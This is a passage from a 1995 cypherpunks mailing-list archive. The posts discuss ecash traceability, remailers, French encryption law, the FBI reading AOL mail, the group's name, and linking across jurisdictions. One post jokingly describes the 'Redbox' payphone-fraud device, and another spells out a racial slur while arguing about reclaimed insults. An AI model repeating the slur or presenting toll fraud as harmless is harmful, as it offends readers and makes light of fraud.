passed through many people's hands in the meantime and their identities
are not known.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 15 Sep 95 05:03:32 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <28922.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  tcmay@got.net (Timothy C. May)  writes:
> Hal, a very nice summary!

Yes, good job Hal.

> Why not "online clearing" as the preferred model, then?

Because you lose most (all?) anonymous abilities. (I think)

> (There are more abstract ways of viewing this advantage. While mere
> software is always duplicable, and cash numbers are of course duplicable,
> one thing that is not duplicable is this: "the first agent to present a
> valid number at this bank." There can be only one of these, and this
> uniqueness is what keeps the currency from collapsing, what introduces
> _conservation_ into the system.)
>
> Well, since Alice knows her own blinding factors, she will always be able
> to say to the bank: "My cash will look like this. Watch for it."

So when the money Alice gave to Bob gets deposited by TCMay,
That it was Alice's is instantly known. This is not how physical cash works.

There is a chain from TCMay through some number of steps to Bob.
Even if you can't find it with this single case, you could use
a zero-knowledge type proof to slowly uncover Bob's identity.

I keep wanting to believe in ecash, but I'm not convinced
it can exist.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 15 Sep 95 05:23:33 PDT
To: cypherpunks@toad.com
Subject: VIO_lat
Message-ID: <199509151223.IAA22176@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-15-95. NYPaper:


   "Company Says Electronic Mail Was Opened to Find
   Pornography."

      America Online gave the FBI access to the mailboxes of
      its subscribers to identify several thousand users who
      viewed images of children in sexual poses and to trace
      messages beyond AOL to many more computer users
      nationwide. Because electronic mail has a life of days
      or weeks, can be traced and can be easily copied without
      alerting the owner, reading the mailboxes was
      particularly effective. It was unclear how much
      information about subscribers is routinely kept and how
      much private information was provided to the FBI.
      Actions of users can be recorded and can reveal much
      more personal information than the records of a telephone
      company.


   "F.B.I. Chemist Says Experts Are Pressured To Skew Tests."

      Officials at the F.B.I. crime laboratory have been
      accused by one of its chemists, Frederic Whitehurst, of
      pressuring forensic experts to commit perjury to help
      secure criminal convictions. With opinion polls showing
      public support for the F.B.I. eroding after
      Congressional hearings into the Branch Davidian siege,
      the accusations regarding the laboratory are in some
      ways the worst blow yet.


   Two:  VIO_lat  (11 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Fri, 15 Sep 95 08:36:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <Pine.SUN.3.91.950915055557.22150A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950915082125.12633F-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, Duncan Frissell wrote:

> 
> On Thu, 14 Sep 1995, Lucky Green wrote:
> 
> > The answer is trivial. If it pisses off the fascists in power enough, you
> > go to jail or get killed.

> 
> As a libertarian nut, I bow to no one in my love of extreme statements.  
> But I feel compelled to squash this particular notion whenever I see it.  
> Randy Weaver really pissed off the Feds and did not go to jail (except 
> during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
> the kids but they are minors).
> 
> DCF
> 

Not quite squashed, Duncan.  Bullet placement (poor by some standards)
is all that prevented Mr. Weaver from croaking like his unfortunate wife.
She is said to have "pissed off" the feds but was not charged with a
single actionable item yet she remains quite dead.

Unless I have missed something somewhere, no TLA is concerned in the slightest
with individual liberty.  That notion should keep a rational person awake
nights.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 05:59:09 PDT
To: loki@obscura.com
Subject: RE: Mixmaster status
In-Reply-To: <ac7edf5800021004fd74@[137.110.24.250]>
Message-ID: <m0staLr-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Fri, 15 Sep 1995 01:03:58 -0700
   From: loki@obscura.com (Lance Cottrell)

   Let me be crystal clear.
   1) I will not support any version of Mixmaster that is weakened.
   2) All future clients will be able to generate the current message format.
   3) All future servers will be able to read the current message format.
   4) There will always be a free version of the client with source code.

And also that Mixmaster(tm) is a trademark of Lance Cottrell, and as
long as he owns it, he controls the use of it.  If you trust Lance,
you can trust the name Mixmaster(tm).

   While I have not discussed it, I can not imagine that there would not also
   be a free version of the server code (with source). Without remailers what
   is the point of the client software? 

I'm confused here.  Isn't every copy of mixmaster potentially a client
and/or server?  That seems to me to be one of the beautiful aspects of
mixmaster -- run a remailer and you greatly increase your own privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMFl4eabBSWSDlCdBAQFkOgP+KN3YYk6Wvq7T4V+uihg6u8NVY3iRobMJ
LFOrpm5LrG/WGMfpUouUt4/XfItWrEkRobgFLZaZ407tMkdG0tOUXSixmohdzXS9
AzEB6+Rj+KHqKjRiM2YTdUGLxLF2oQLoN05g2Trj3/V1XQrHwLU7zj/H6nJlrz1M
FP6A5KCc+EU=
=lzQY
-----END PGP SIGNATURE-----

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Fri, 15 Sep 95 09:04:16 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NSA on GAK
Message-ID: <v02110103ac7efea7e15c@[204.179.132.6]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:25 9/14/95, Rich Salz wrote:
>>> Internet runs on software distributed over the Internet.
>
>This is more like an aphorism than a true statement.

Um, not really. I dunno about you, but I don't bother to get new ROMs from
cisco for each new software release - I FTP the code over the net, and
write it into flash RAM in the routers (or net boot it). So, in fact, there
are many sites (and backbones) for which that statement is literally true.

Erik Fair

P.S.    And yes, cisco does publish MD5 hashes of their binaries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 15 Sep 95 06:08:25 PDT
To: cypherpunks@toad.com
Subject: Chiffrement en Fr
Message-ID: <199509151308.JAA21250@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


A web search for Quisquater led to:

   URL: http://www.cnam.fr/Network/Crypto/

which offers, among other belle chiffre-escrits:


                    THE USE OF ENCRYPTION IN FRANCE

   Encryption is the technique of modifying a file so as to make it
   unreadable by people for whom it is not intended. Long the preserve
   of the military, it is now an indispensable tool in the age of
   networks for those who want to protect the confidentiality of their
   messages. Its use raises various questions. While this Web page is
   one of the first in France, there are many in the United States.

   I will not say much about technique on this page. If you want to
   know more, see:
     * The excellent server of the Groupe de Recherche en Complexité et
       Cryptographie,
     * Some modest explanations.

   Encryption is practically forbidden in France by law 90-1170 of
   29 December 1990 (with implementing decree in December 1992). An
   excellent little brochure (with a sphinx on the cover :-) from the
   Délégation Interministérielle pour la Sécurité des Systèmes
   d'Information (DISSI) explains this law (but unfortunately does not
   detail its actual conditions of application). It is sent free of
   charge on request:

   DISSI

   3 avenue Octave Gréard

   75007 PARIS

   The Service Central de la Sécurité des Systèmes d'Information
   (SCSSI) is the body to contact for more information and for filing
   authorization requests. There are two cases:

    1. Either you use encryption solely for authentication (encrypting
       passwords so that they do not travel in the clear over the
       network, for example): you must file a declaration with the
       SCSSI, which is then verified.

    2. Or you use it for confidentiality. You must then request an
       authorization from the SCSSI.


   SCSSI

   18, rue du Docteur Zamenhof

   92131 ISSY-LES-MOULINEAUX Cedex

   Tel.: (1) 40 95 37 15

   Fax: (1) 40 95 37 01

   In both cases, the request may have been made by the developer or
   the vendor of the software.

   More details are given in Bruno Malhey's presentation (also in
   PostScript). I would add that the criteria for acceptance or refusal
   are not public. It seems that authorization is granted only to
   "serious" institutions (banks, ...) and on condition that software
   that is too effective is not used. The point is to preserve the
   ability of the police to follow the exchanges. Note that most
   countries comparable to France permit encryption, as shown by
   Sylvain André's excellent survey (you can also see the American
   government's study).

   The best-known encryption software is PGP (Pretty Good Privacy).
   Free, fairly simple to use, very effective, well documented, running
   on many platforms (Unix, MS-DOS, Macintosh), it is an excellent tool
   for the user. It seems that its authorization in France is out of
   the question. Note that, if you want to use PGP in France, you face
   two successive obstacles:

    1. PGP is banned from export by the United States. You must
       therefore retrieve one of the (many) versions from a
       non-American server.

    2. Encryption is subject to authorization in France. See above.

   Some people find that another obstacle to using PGP is its
   difficulty of use. They can read Garfinkel's remarkable book:

   Simson Garfinkel
   PGP ; Pretty Good Privacy

   O'Reilly & associates

   ISBN 1-56592-098-8

   And there are other presentations of PGP, such as the one by
   Ollivier Robert (PostScript files PGP.*.ps), which also exists in
   the form of a Web server.

   PGP protects files, either during their transmission over the
   network (by electronic mail or another method), or locally. Other
   software protects, for example, remote connections or the X window
   system (SSH provides both functions). Visit the "International
   Cryptography Pages" Web service for all possible information, in
   particular on software available outside the United States.

   Finally, after this purely factual information, here is my opinion.

See also

     * The Electronic Frontier Foundation, which fights for the rights
       of the citizen in the computerized world, has a great deal of
       information on encryption.
     * Computer Professionals for Social Responsibility also works on
       respect for privacy.
     * Still in French, but concerning Québec more specifically.


   Page made by Stéphane Bortzmeyer on the CNAM server. Last updated
   4 August 1995.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 15 Sep 95 06:14:54 PDT
To: cypherpunks@toad.com
Subject: Smart Cards, Credit cards, Payment systems
Message-ID: <199509151314.JAA21423@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.dice.ucl.ac.be/~dhem/card.html


Smart Cards, Credit cards, Payment systems.
   
   This page is under development.
     
_________________________________________________________________

   
   Card Europe
       DigiCash
       MasterCard
        Futur 1 , 2
   Virtual Open Network Environment (V-ONE)
       MONDEX
       AT&T and GiroVend agree to promote smart card applications
       AT&T Universal Card Services
       ATT buyinfo
       ibd.ar.com/lists/comp/cypherpunks
       Discussions, mailing lists, and sites , Payment mechanisms
       designed for the Internet
       News items on information technology (Not especially Smart Cards)
       Electronic Cash, Tokens and Payments in the National Information
       Infrastructure
       Forum On Risks To The Public In Computers And Related Systems
       (ACM)
        The Risks Digest Volume 4: Issue 32
            The Risks Digest Volume 15
            The Risks Digest Volume 16
   SMI Finger Check -- Fingerprint Verifier
       DIGITAL SRC Research Reports
        Authentication and Delegation with Smart-cards
   Innovonics
       QC consultancy
       University of Wollongong: Centre for Computer Security Research
       SecureWare, Inc.
       OKI
       Telecom (Smart) Cards Museum (big)
       Buying Prepaid Calling Card
       S. Brands
       Cyberbank '95
       Electronic benefits transfer (EBT) in US
       NCSA/DTIC Security Seminar
       Power Broker
       First Union Corp. will offer stored-payment ''smart cards''
       Network Payment Mechanisms and Digital Cash
       PCMCIA Cards
       THE PREPAID & RECHARGEABLE PHONE CARD
       Cardservice International
       
     
_________________________________________________________________

   
   UCL crypto group
     
_________________________________________________________________

   
   Last update: 11 September 1995.
   Send any comment to: Dhem@dice.ucl.ac.be (J.-F. Dhem)
   
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 09:46:17 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac7efcda09021004ddba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Excellent discussion on the subject, actually. However, your idea of
>the "first person to the bank" maintaining anonymity via remailer block
>is flawed. First of all, if a collusion with the bank is being taken into
>account, presumably sufficient enough resources are involved that someone
>may try and track the reply block. Mixmaster (as your messages mentioned
>by name) would be necessary to eliminate the chance of tracking the block
>through combinations of replay attacks etc. (Which reminds me, has anyone

Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have
nothing against Mixmaster, but "mix" is the term Chaum invented for what we
later started to call a "remailer."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 15 Sep 95 06:53:09 PDT
To: cypherpunks@toad.com
Subject: Loi Log
Message-ID: <199509151352.JAA23300@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


There was an uncharacteristically long delay (2+ hours) in
receiving documents from the 
<http://www.cnam.fr/Network/Crypto/> site, including those 
linked to non-fr sites.


Not sure if it is due to self-applied site restrictions or the 
other loi-logging.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 15 Sep 95 06:59:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <ac7c634618021004e6d8@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950915090844.29758A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Timothy C. May wrote:

> >
> >     We too often think of ourselves as an elite - smarter and better in
> >various ways to our non-cpunk neighbours. We refer to these others as
> >'Joe Sixpack' and other such derogatory terms.
> >
> >     The problem is that in doing so we are marginalizing ourselves.
> >
> >     We call ourselves 'cypherpunks'. While this is derived from the SF
> >term 'cyberpunk', consider the image we are creating for ourselves:
> >
> >     A 'punk' is a marginalized young adult, one who rejects the norms
> >of his or her society, and takes delight in irking those around him with
> >his or her rejection. The older of us will think of James Dean in 'Rebel
> >Without a Cause', or Brando in 'The Wild One'. Later, you get images
> >such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> >other icons of the 'punk rock' movement.
> 
> While I have had some qualms about the name, on balance I think it has been
> good for us. After all, it's not as if _other_ groups don't already exist!
> In particular, the British branch of Cypherpunks disliked the name
> "Cypherpunks" so much that they used a different name for themselves, the
> "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
> whatever reasons. But the name may have been a factor, at least.

I agree with Peter's point... some of the core cypherpunks (I'll not
mention names) can be somewhat elitist, whether they mean to or not.  Not
that they don't have some reason to be...as Pat Farrell once told me the
cypherpunks mailing list is, to some degree, an IQ filter.  Many
cypherpunks have a firm reason for some self-indulgent pride.  However,
our goal (or, at any rate, _a_ goal) is to make crypto use ubiquitous,
and for this we must deal with the public at large in a, perhaps, more
diplomatic and user-friendly manner. 

<snip> 

8> 
> We fill a certain niche which is useful to have filled, a more radical
> facet of things. If we didn't exist, or renamed ourselves "Concerned
> Citizens for Cryptographic Protection," CCCP, then somebody would have to
> _invent_ the Cypherpunks!
> 

True, but if the majority of active participants see an alternative
agreeable to them, they may just switch and start calling themselves
something else.  If the list owner likes it and changes the name of the 
list, then what of the cypherpunks unwilling to change?  It would appear, 
then, that they would be the ones who would have to find somewhere else 
to go.

>            - We are actually not very "punkish" at all. About as punkish
>               as most of our cyberpunk cousins are, which is to say, not
>               very.

Anybody who reads the mailing list or the cyphernomicon knows this, but 
anyone hearing the name for the first time does not get this impression.

> 
> Getting back to your suggestion that "we" change the name to something more
> respectable. How could "we" do this, given that "we" are an effective
> anarchy?
> 
> I can't imagine a vote on this, and the endless debates on what "we" ought
> to call ourselves would be a waste of time.

Better than a vote (and more effective in western culture, where only 39% 
of the population votes anyway but just tends to go with the flow) is to 
propose an alternative, flat out, adopt it for yourself, and whoever 
prefers it will follow your lead.  If nobody likes it, then the 
cypherpunks are simply here to stay.

> 
> Fortunately, there's an elegant solution: form your own group.
> 
> Form your own group, your own mailing list, with a catchy name, something
> like "The Privacy Education Foundation," or "The American Civil Liberties
> Union" (whoops, taken), or "The Society for the Preservation of
> Cyberspatial Liberty."
> 
> Then announce it on our list, and elsewhere. People will vote with their
> feet. If your "meme" is catching, your list will rapidly gain members.
> Maybe this Cypherpunks list will even atrophy away.
> 
> Evolution in action. The market in action. A better approach than trying to
> get the name and the charter changed.
> 

My point is that you may not have to do all this.  This is a recurring 
thread on the list. . . if enough people feel the same way you do you 
could have the human resources effective for a cypherpunks "take-over".

As for myself, I don't think I would change. . . I actually _am_ a 
"long-haired weirdo".  I think a slightly more conservatively named 
organization similar to the cypherpunks would be a good thing, however, 
simply because I like the idea of having something more low-key to compare 
c-punks with, sort of like the IRA to Sinn Fein.  I'm just offering some 
humble advice, knowing full well that I am for the most part an unknown 
lurker without much reputational weight to throw around.  It's also part 
of a leadership dynamic that is, I feel, underused.  (Furthermore, if it 
works, I could use it as a paper topic for my social psychology class ;). )

Sincerely, 
-=Kathleen M. Ellis=-

<ObDCCPPlug> If you can come, don't forget that the DC Cypherpunks are 
having a meet on Saturday at 3pm at Digital Express in Beltsville, 
MD..email me for directions or info on our mailing list. </OBDCCPPlug>

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 15 Sep 95 07:02:47 PDT
To: cypherpunks@toad.com
Subject: Oct Byte - Wayner's article heh
Message-ID: <199509151402.KAA10522@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



Check it out



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 10:30:47 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7f025e0a0210042977@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 PM 9/15/95, K. M. Ellis wrote:

(quoting my response)


>> We fill a certain niche which is useful to have filled, a more radical
>> facet of things. If we didn't exist, or renamed ourselves "Concerned
>> Citizens for Cryptographic Protection," CCCP, then somebody would have to
>> _invent_ the Cypherpunks!
>>
>
>True, but if the majority of active participants see an alternative
>agreeable to them, they may just switch and start calling themselves
>something else.  If the list owner likes it and changes the name of the
>list, then what of the cypherpunks unwilling to change?  It would appear,
>then, that they would be the ones who would have to find somewhere else
>to go.

Indeed, if a majority of folks on this list start calling themselves
"Martians" or "Crypto Tools," then I suppose this list will _gradually_
adopt that name. Though even then there are no guarantees, as this list is
run on a machine not controlled by a list democracy.

Go for it! If you wish the folks on this list to call themselves "Concerned
Citizens for Cryptographic Freedom," then start calling yourself that.

What I think would be a waste of everyone's time is a drawn-out series of
proposals for new names, a debate which is unlikely in the extreme to
result in a new name.

>Better than a vote (and more effective in western culture, where only 39%
>of the population votes anyway but just tends to go with the flow) is to
>propose an alternative, flat out, adopt it for yourself, and whoever
>prefers it will follow your lead.  If nobody likes it, then the
>cypherpunks are simply here to stay.

Indeed, some people here have been calling themselves by various names
("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise
the terms "geek," "dweeb," and "nerd," and think anyone who calls
themselves by these insults is not "reclaiming and deconstructing the
labels of the oppressor class," as the slogan goes, but is merely insulting
themselves. Blacks who call themselves "niggers," homosexuals who call
themselves "queers," and computer programmers who call themselves "geeks"
and "dorks" are all playing the same game.

>"long-haired weirdo".  I think a slightly more conservatively named
>organization similar to the cypherpunks would be a good thing, however,
>simply because I like the idea of having something more low-key to compare
>c-punks with, sort of like the IRA to Sinn Fein.  I'm just offering some
>humble advice, knowing full well that I am for the most part an unknown
>lurker without much reputational weight to throw around.  It's also part
>of a leadership dynamic that is, I feel, underused.  (Furthermore, if it
>works, I could use it as a paper topic for my social psychology class ;). )

The problem is not a "leadership dynamic," the problem is that name changes
are not easily arranged. With 700 people on this list, many of whom appear
to _like_ the name, how long will it take before enough want to change to
make it so? And who says democracy is such a good thing? What if 200 want
to change, 100 don't, and the rest don't care or don't "vote"?

A better approach is for the "conservatives" who want a "more conservative"
name to simply do what I suggested: form a new group and name it what they
like. They wouldn't have to quit this list, they would just be able to
cleanly recruit for their new list.

Seems simple to me. And honest. And less divisive than trying to change the
name of a group with a long history (by modern standards) and with several
well-known achievements.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 15 Sep 95 07:35:57 PDT
To: Tom Rollins <kelso@netcom.com>
Subject: Re: Why ecash is traceable
In-Reply-To: <199509151220.FAA00243@netcom4.netcom.com>
Message-ID: <Pine.A32.3.91.950915103403.44707A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Sep 1995, Tom Rollins wrote:

> Just a little humor...
> Perhaps Electronic Cash has a sound.
> Phone Phreakers have something called a Redbox.
> This device makes the sound of a quarter.
> When an ATT pay phone asks you to deposit $1.75
> you just make the sound of 7 quarters... :)

New Zen koan?  What is the sound of 7 quarters *not* being deposited?

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFmPJKDthkLkvrK9AQEPdgP/S7OTS7EjSSNiwFgFPFdgs+gymPKVgUaT
5iuSEXGxHJDSzdZocuA7NoT4OUvpYriC7Lkk3uaSQ5kNPX/2veXzEowh1+nFfDmq
8Lgay1MpanwOlZC3F/VrBJP6m2eZtUdhN+qejccqyU0EiQZN1idUkpFCel9D6lu+
TYmkRLVGDOc=
=KjF7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 15 Sep 95 10:39:33 PDT
To: cypherpunks@toad.com
Subject: [revcoal@pcnet.com: Re: The owls are not what they seem]
Message-ID: <9509151740.AA06675@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



fyi...

Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
From: "Donna J. Logan" <revcoal@pcnet.com>
To: Marilyn159@aol.com
Cc: Search Net <snet-l@world.std.com>
Subject: Re: The owls are not what they seem
In-Reply-To: <950912141715_17265559@mail06.mail.aol.com>
Mime-Version: 1.0
Sender: snet-l-approval@world.std.com
Precedence: bulk
Reply-To: snet-l@world.std.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 1330

It's your service provider....same thing happened to a whole bunch of
us when we used to be on it...and only selective posts to selective lists.
Look to the headlines your provider has generated the past few days and
you'll get a clue as to what's going on...except the net spread by them and
the feds is a lot wider than just kiddie pornographers.

BTW, I'm being cagey in actually mentioning your service provider's name/
initials, as we found that was one of the "keywords" in the filter program
used by them and a certain national police agency (whose initials also
trigger the filter program) to flag posts which they thought may be 
"interesting", resulting in delays of up to days in posting.  Same thing
happened in live chat in PRIVATE chat rooms, we were able to bring the
system to a complete halt by just typing the initials of Frederico's
Bumbling Idiots....

The only solution to Amerigo's Obnoxious Lackeys was to cancel our 
accounts and switch to CHEAPER local service providers, who also happen
to provide BETTER service, with no censorship/surveillance.

;->

On Tue, 12 Sep 1995 Marilyn159@aol.com wrote: 
> This is so weird...
> Only pieces of the message I sent are getting through. This is a little bit
> more but not the whole thing.
> Where is the rest of it?
> Is this censorship or computer error?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 15 Sep 95 10:57:40 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509151752.KAA04838@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Meaning:  In all cases, if a page is being shown and
>it links to another page, then the other page is being
>shown.
>I wonder if I have a pornopage.

Does this mean that if I have a link to Infoseek or
another search engine, that I, too, am hosting
pornography?  

Which would be an interesting idea as far as trying to
present a "safe" way to search the Internet.  A web-
crawler or other search mechanism of choice could be started
up, and simply refuse to run searches for certain keywords.
Ideally (but impractical) any pages dug up that contain
the questionable words could be manually checked.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 15 Sep 95 02:57:45 PDT
To: rsalz@osf.org
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9935.9509150957@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz <rsalz@osf.org> writes:
> >Suppose we interpret Linking = Showing as
> >
> >For all web pages x and y,
> >Showing(x) and  Linkto(x,y) --> Showing(y)
> 
> Then we would be fools.  No more so than buying a book means you
> have instant access to all resources mentioned as footnotes or in
> the bibliography.
> 
> Put more simply, *you have to click on Y* so they're not the same.

Another even more subtle problem is inline images, can you say that a
page with an inline image sourced from a foreign site must obey the
foreign jurisdiction.  I would assert this is so, because the web
surfer's *browser* imports the relevant parts of the page from
whatever locations (and jurisdictions) they are in, and displays them
as one page.

Take a look at:

	http://www.obscura.com/~shirt/

which is the www space Lance kindly donated for the UK munitions-T.
The relevance to this discussion is that www.obscura.com is of course
in the US, whilst the inline graphic is in the UK for ITAR reasons,
the is of:


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


ie the html looks like:

	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">

So that the image is *imported* by the *viewer*, and not supplied by
www.obscura.  This means that people outside the US can also view the
page with out anyone breaking any laws, even though it appears to
contain (allegedly) ITAR contravening material.

Same would apply quite nicely to porn from the netherlands etc.

[as an aside, any one got info on how you go about converting gifs to
transparent gifs - I want the above to be transparent so that it still
works on other than a black background in case other people use it on
other backgrounds]

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 08:13:26 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509151512.AA08301@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I think this case is safer than the porn one, because the actual data
> in this case is legal in both jurisdictions, it just must not be
> transferred from jurisdiction US -> jurisdiction non-US, which it has
> not been.

I believe you're right, this is the key distinction which I missed.
(Disregard my earlier email to you :)

Thanks for the patient explanation.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 15 Sep 95 10:13:36 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why ecash is traceable
Message-ID: <v01510100ac7f533817cc@[198.59.115.130]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote,
>I don't think all systems must be able to deal with double spending.
>
>For example, the first person to read this number: 45%2)d[12ks&Qmdx and to
>then submit it any form--in person, by e-mail, via remailer, etc.--to The
>First Bank of Cyberspace will have $10 sent to him or her, as cash or as a
>spendable amount of digicash (untraceable to recipient, of course).

I would expect that services might emerge that would strengthen this
without the bank getting involved and without loss of anonymity.

It might emerge that because of the bank's lack of handling of double
spending that in some transactions some payees would request a money order
from a trustee.  The payee might supply the list of money order suppliers
allowed for that day.  If the payee does not want the money order addressed
with a public key, he can supply a set of alternate keys each encrypted for
an acceptable trustee.  The money order allows the payee to be as sure that
the cash is good as he trusts the trustee (and the bank).

With or without the use of a remailer this can add to hiding the payer.
However, unless the payee provides a hidden key, the trustee does know who
received some payment.  The trustee is highly motivated to operate a
memoryless system (except for the trustee's own cash) and might be audited
to ensure this to both customers and potential physical raiders.

The cash bundled in the money order need not be that returned from
exchanging the money order payment.  Some trustees might return a money
